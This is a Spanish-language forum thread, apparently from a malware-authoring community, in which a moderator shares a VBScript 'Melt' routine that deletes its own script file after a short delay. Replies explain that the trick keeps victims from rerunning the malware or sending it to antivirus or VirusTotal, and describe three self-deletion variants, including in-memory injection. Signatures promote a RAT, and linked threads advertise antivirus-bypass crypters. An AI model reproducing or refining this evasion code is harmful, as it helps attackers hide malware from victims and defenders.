Mostrar mensajes previos
Ordenar por
por Scorpio Moderador
Bueno, este es un simple Melt que me hice que trata de no dejar ningun rastro. 
sMelt(WScript.ScriptFullName)

Function sMelt(sFile)
    On Error Resume Next
	
	Dim sFunction
	
    sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & sFile & Chr(34)
	
	Execute(sFunction)
End Function
//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
por M3 Usa camisa de fuerza
Se te olvido copiar el archivo a una ruta primer no ?

Deja la hierba compa jaja


Saludo capo
Indetectables RAT v.0.9.5

@Indetectables Team
por Scorpio Moderador
M3 escribió:Se te olvido copiar el archivo a una ruta primer no ?

Deja la hierba compa jaja


Saludo capo
Jaja, bro, ¿Melt no es "Derretir" el archivo?, yo personalmente uso la funcion para el comando Uninstall. xD

PD:La hierba buena nunca se deja jaja

Saludos bro.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
por Filisko Se conecta desde un manicomio
Scorpio escribió:
M3 escribió:Se te olvido copiar el archivo a una ruta primer no ?

Deja la hierba compa jaja


Saludo capo
Jaja, bro, ¿Melt no es "Derretir" el archivo?, yo personalmente uso la funcion para el comando Uninstall. xD

PD:La hierba buena nunca se deja jaja

Saludos bro.
sí, es destruir el mismo archivo
por M3 Usa camisa de fuerza
Exacto asi és , ¿ pero no sirve de mucho se no se copia a otra ruta e se ejecuta primer ?
Entiendes ¿

Buen code

Saludo
Indetectables RAT v.0.9.5

@Indetectables Team
por M3 Usa camisa de fuerza
Bueno , creo me expresso malo , todavia , buen code

Saludos
Indetectables RAT v.0.9.5

@Indetectables Team
por Pink Usa camisa de fuerza
Buen code. lo que M3 dice es:


MeltFile:
Se llama "Melt" cuando un usuario ejecuta un archivo y este desaparece (se auto-elimina) después de ejecutarse, esta función es necesaria para evitar que nuestra víctima ejecute 2 veces nuestro malware o evitar que la victima lo envíe a un Antivirus o a virustotal después de ejecutarlo, su estructura es...

mira este ejemplo:

http://www.indetectables.net/viewtopic. ... 7&p=392954


la definicion de melfile la saque de aqui:
[Enlace externo eliminado para invitados]
Saludos
Imagen
por Metal_Kingdom Incurable
Entiendo a M3, tiene su explicación:

Existen 3 tipos de Melt:

[*]El que se autoelimina del disco tras cumplir sus objetivos (no queda rastro ni en memoria ni en disco).
[*]El que inyecta el fichero en memoria mientras que en disco se autoelimina (se sigue ejecutando pero no existe en disco), este es útil en desinstalaciones de server, stealers...
[*]El que realiza una copia del fichero a otra ruta (como temp), ejecuta dicha copia y elimina el fichero original, este es el más común.

Saludos.
UDTools.net
GitHub: https://github.com/MetalUDT
Temas similares
VBS Crypter ByPass AV ByRoda por Roda en Troyanos y Herramientas
WSHRat VBS Cracked! por Roda en Zona de Análisis
VBS Crypter ByPass NOD 32 AVAST DEFENDER. por Roda en Troyanos y Herramientas
Convertir EXE a VBS por savioladj en Dudas y Preguntas
Variantes de tema
Responder

Volver a “Fuentes”